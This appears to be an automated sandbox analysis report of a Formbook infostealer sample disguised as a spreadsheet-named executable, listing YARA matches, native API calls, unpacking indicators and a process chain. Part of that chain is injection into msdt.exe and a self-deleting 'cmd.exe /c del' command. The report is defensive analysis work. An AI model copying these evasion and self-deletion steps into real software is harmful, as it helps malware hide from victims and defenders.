          Source: 6.2.PI L032452021xxls.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.PI L032452021xxls.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.PI L032452021xxls.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.PI L032452021xxls.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: PI L032452021xxls.exe, Form1.csLong String: Length: 38272
          Source: 0.0.PI L032452021xxls.exe.5b0000.0.unpack, Form1.csLong String: Length: 38272
          Source: 0.2.PI L032452021xxls.exe.5b0000.0.unpack, Form1.csLong String: Length: 38272
          Source: 5.2.PI L032452021xxls.exe.390000.0.unpack, Form1.csLong String: Length: 38272
          Source: 5.0.PI L032452021xxls.exe.390000.0.unpack, Form1.csLong String: Length: 38272
          Source: 6.2.PI L032452021xxls.exe.670000.1.unpack, Form1.csLong String: Length: 38272
          Source: 6.0.PI L032452021xxls.exe.670000.0.unpack, Form1.csLong String: Length: 38272
          Source: PI L032452021xxls.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.PI L032452021xxls.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.PI L032452021xxls.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.PI L032452021xxls.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.PI L032452021xxls.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 0_2_00FF2790
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 0_2_00FF1060
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 0_2_00FF1050
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 0_2_00FF5300
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 0_2_0296E612
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 0_2_0296E618
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041E81B
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00401026
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041D8F0
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041D975
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041E1DE
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041DCDD
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041D489
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041D5C4
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041E5F3
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00402D8A
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00409E40
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041DE42
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00409E3C
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041D6C7
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041CFA3
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00402FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05182D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05181D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051820A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05182B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05181FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051822AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05182EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3E81B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3E1DE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3E5F3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D22D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D22D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D29E40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D29E3C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D22FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3CFA3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 050BB150 appears 35 times
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00419D5B NtCreateFile,
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00419DB4 NtCreateFile,
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00419E0A NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D39D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D39E90 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D39E10 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D39F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D39DB4 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D39D5B NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D39E0A NtReadFile,
          Source: PI L032452021xxls.exeBinary or memory string: OriginalFilename vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exe, 00000000.00000002.382841822.0000000002A37000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exe, 00000000.00000000.352313746.00000000005B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRefFla.exeh$ vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exe, 00000000.00000002.392040604.00000000070D0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exeBinary or memory string: OriginalFilename vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exe, 00000005.00000002.377835074.0000000000392000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRefFla.exeh$ vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exeBinary or memory string: OriginalFilename vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exe, 00000006.00000002.477767429.00000000013CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exe, 00000006.00000002.475602589.0000000000672000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRefFla.exeh$ vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exe, 00000006.00000002.479958779.0000000003190000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exeBinary or memory string: OriginalFilenameRefFla.exeh$ vs PI L032452021xxls.exe
          Source: PI L032452021xxls.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PI L032452021xxls.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PI L032452021xxls.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PI L032452021xxls.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: PI L032452021xxls.exeVirustotal: Detection: 20%
          Source: PI L032452021xxls.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PI L032452021xxls.exe 'C:\Users\user\Desktop\PI L032452021xxls.exe'
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess created: C:\Users\user\Desktop\PI L032452021xxls.exe C:\Users\user\Desktop\PI L032452021xxls.exe
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess created: C:\Users\user\Desktop\PI L032452021xxls.exe C:\Users\user\Desktop\PI L032452021xxls.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PI L032452021xxls.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess created: C:\Users\user\Desktop\PI L032452021xxls.exe C:\Users\user\Desktop\PI L032452021xxls.exe
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess created: C:\Users\user\Desktop\PI L032452021xxls.exe C:\Users\user\Desktop\PI L032452021xxls.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PI L032452021xxls.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI L032452021xxls.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@2/2
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5224:120:WilError_01
          Source: PI L032452021xxls.exe, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.PI L032452021xxls.exe.5b0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.2.PI L032452021xxls.exe.5b0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 5.2.PI L032452021xxls.exe.390000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 5.0.PI L032452021xxls.exe.390000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.2.PI L032452021xxls.exe.670000.1.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PI L032452021xxls.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PI L032452021xxls.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: PI L032452021xxls.exe, 00000006.00000002.479958779.0000000003190000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PI L032452021xxls.exe, 00000006.00000002.477252553.000000000123F000.00000040.00000001.sdmp, msdt.exe, 00000011.00000002.628655231.0000000005090000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PI L032452021xxls.exe, 00000006.00000002.477252553.000000000123F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: PI L032452021xxls.exe, 00000006.00000002.479958779.0000000003190000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: PI L032452021xxls.exe, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.PI L032452021xxls.exe.5b0000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.PI L032452021xxls.exe.5b0000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.PI L032452021xxls.exe.390000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.PI L032452021xxls.exe.390000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.PI L032452021xxls.exe.670000.1.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
